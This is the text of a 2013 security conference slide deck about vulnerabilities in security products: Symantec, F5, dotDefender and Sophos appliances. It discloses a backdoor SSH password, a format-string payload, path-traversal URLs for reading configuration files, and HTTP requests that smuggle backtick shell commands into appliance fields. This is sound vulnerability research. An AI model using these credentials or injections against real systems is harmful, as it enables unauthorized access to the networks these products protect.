(in)Security SoftwareBy Alexander Antukh

May 26, 2013

/whoami

Alexander Antukh

Security Consultant Offensive Security Certified Expert Interests: kittens and stuff

3

Agenda

• Introduction• What is Security Software • Historical review• The Question• The Answer• Vuln, where art thou?• Afterward

• QA

(in)Security Software

4

The question

Do you know anybody less boring?What if the SS is vulnerable itself?

(in)Security Software

5

The answer

*sorry for my English

(in)Security Software

The answer• Symantec Messaging Gateway

– Backdoor by designCode execution

• F5 BIG-IP– SQL Injection, XXE Passwords… Root access

• Applicure dotDefender WAF– Format string vulnerability Code execution

• Sophos Web Protection Appliance– LFI, OS Command Injection Command execution, admin account pwn

Security software products are the target of the trade ... already!

6(in)Security Software

The answer

“... inbound and outbound messaging security, with effective and accurate real-time antispam and antivirus protection, advanced content filtering, data loss prevention, and email encryption ...“

Symantec Messaging Gatewayv.9.5.x

SSH?! Login: supportMD5: 52e3bbafc627009ac13caff1200a0dbfPassword: symantec

7(in)Security Software

The answer

“... inbound and outbound messaging security, with effective and accurate real-time antispam and antivirus protection, advanced content filtering, data loss prevention, and email encryption ...“

Symantec Messaging Gatewayv.9.5.x

SSH?! Login: supportMD5: 52e3bbafc627009ac13caff1200a0dbfPassword: symantec

8(in)Security Software

The answerF5 BIG-IP <= 11.2.0

“... from load balancing and service offloading to acceleration and security, the BIG-IP system delivers agility—and ensures your applications are fast, secure, and available ...“

9(in)Security Software

The answerF5 BIG-IP <= 11.2.0

“... from load balancing and service offloading to acceleration and security, the BIG-IP system delivers agility—and ensures your applications are fast, secure, and available ...“

10(in)Security Software

The answerF5 BIG-IP <= 11.2.0

“... from load balancing and service offloading to acceleration and security, the BIG-IP system delivers agility—and ensures your applications are fast, secure, and available ...“

11(in)Security Software

The answer

“... from load balancing and service offloading to acceleration and security, the BIG-IP system delivers agility—and ensures your applications are fast, secure, and available ...“

sam/admin/reports/php/getSettings.php

12

F5 BIG-IP <= 11.2.0

(in)Security Software

The answer

“... dotDefender is a web application security solution (a Web Application Firewall, or WAF) that offers strong, proactive security for your websites and web applications ...“

Web Attack?

13

AppliCure dotDefender WAF <= 4.26

(in)Security Software

14

The answer

• %MAILTO_BLOCK% - email entered in the “Email address for blocked request report” field

• %RID% - reference ID• %IP% - server's IP address• %DATE_TIME% - date of blocked request

Error page can be configured in different ways:

Vars to be added to the body of a custom page:

Looks nice…

AppliCure dotDefender WAF <= 4.26

(in)Security Software

15

The answer

Format string injection

• Variables• Buffer• ...• AP_PRINTF()

check for format string vulnerabilities… should be

<%IP%> Host: …

Algorithm:

%666d\xBA\xAD\xBE\xEF…

AppliCure dotDefender WAF <= 4.26

(in)Security Software

16

The answer

Format string injection

• Variables• Buffer• ...• AP_PRINTF()

check for format string vulnerabilities… should be

<%IP%> Host: …

Algorithm:

%666d\xBA\xAD\xBE\xEF…

AppliCure dotDefender WAF <= 4.26

(in)Security Software

17

The answer

“... our award-winning Secure Web Gateway appliances make web protection easy. They are quick to setup, simple to manage and make policy administration a snap, even for non-technical users...“

Sophos Web ProtectionAppliance <= 3.7.8.1

https://<host>/cgi-bin/patience.cgi?id=..

?id=../../persist/config/shared.conf%00?id=../../log/ui_access_log%00

"https://<host>/index.php?section=configuration&c=configuration&STYLE=8514d0a3c2fc9f8d47e2988076778153" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0"

Passwords!

(in)Security Software

18

The answer

` POST /index.php?c=diagnostic_tools HTTP/1.1...action=wget&section=configuration&STYLE=<validsessid>&url=%60sleep%205%60

Diagnostic Tools

“... our award-winning Secure Web Gateway appliances make web protection easy. They are quick to setup, simple to manage and make policy administration a snap, even for non-technical users...“

Sophos Web ProtectionAppliance <= 3.7.8.1

(in)Security Software

19

The answer

` https://<host>/end-user/index.php?reason=application&client-ip=%20%60sleep+10%60

Block page (%%user_workstation%%“)

“... our award-winning Secure Web Gateway appliances make web protection easy. They are quick to setup, simple to manage and make policy administration a snap, even for non-technical users...“

Sophos Web ProtectionAppliance <= 3.7.8.1

(in)Security Software

20

The answer

POST /index.php?c=local_site_list_editor HTTP/1.1 ...STYLE=<validsessid>&action=save&entries=[{"url"%3a+".'`sleep+10`'",+"range"%3a+"no",+"tld"%3a+"yes",+"valid_range"%3a+"no"}]

Local Site List`

“... our award-winning Secure Web Gateway appliances make web protection easy. They are quick to setup, simple to manage and make policy administration a snap, even for non-technical users...“

Sophos Web ProtectionAppliance <= 3.7.8.1

(in)Security Software

21

The answer

POST /index.php?c=local_site_list_editor HTTP/1.1 ...STYLE=<validsessid>&action=save&entries=[{"url"%3a+".'`sleep+10`'",+"range"%3a+"no",+"tld"%3a+"yes",+"valid_range"%3a+"no"}]

Local Site List`

“... our award-winning Secure Web Gateway appliances make web protection easy. They are quick to setup, simple to manage and make policy administration a snap, even for non-technical users...“

Sophos Web ProtectionAppliance <= 3.7.8.1

(in)Security Software

22

The answerSophos Web ProtectionAppliance <= 3.7.8.1

(in)Security Software

23

Agenda

• Introduction• What is Security Software • Historical review• The Question• The Answer• Vuln, where art thou?• Afterward

• QA

(in)Security Software

Vuln, where art thou?• Methods for identifying usable bugs in “Software products”

– Applicaton testing and Fuzzing– Reverse engineering– Source code analysis

• A short note on so called “security scanning”tools

24(in)Security Software

Vuln, where art thou?

• The workflow for the appliance analysis is pretty simple!

– get a virtual appliance demo version – install the appliance– add the .vmdk to another vm and mount it there (or use a linux fs driver

that can mount vmdk files)– add a new user to /etc/passwd, or change UID/shell/password of existing

users (or maybe change the sudoers file, sshd config)– start the appliance again and log in :)– look at the services that are running (and their configuration)– pwnage ;)

25(in)Security Software

Vuln, where art thou?

• The workflow for the appliance analysis is pretty simple!

– get a virtual appliance demo version – install the appliance– add the .vmdk to another vm and mount it there (or use a linux fs driver

that can mount vmdk files)– add a new user to /etc/passwd, or change UID/shell/password of existing

users (or maybe change the sudoers file, sshd config)– start the appliance again and log in :)– look at the services that are running (and their configuration)– pwnage ;)

26(in)Security Software

Vuln, where art thou?

*Move two matches to make it three equal squares

27(in)Security Software

Vuln, where art thou?

*Move two matches to make it three equal squares

28(in)Security Software

29

Agenda

• Introduction• What is Security Software • Historical review• The Question• The Answer• Vuln, where art thou?• Afterward

• QA

(in)Security Software

30

Sometimes it’s easier to find the vulnerability than it might be expected . . .

*doesn’t exist yet

And now for something completely different

(in)Security Software

QA

(in)Security Software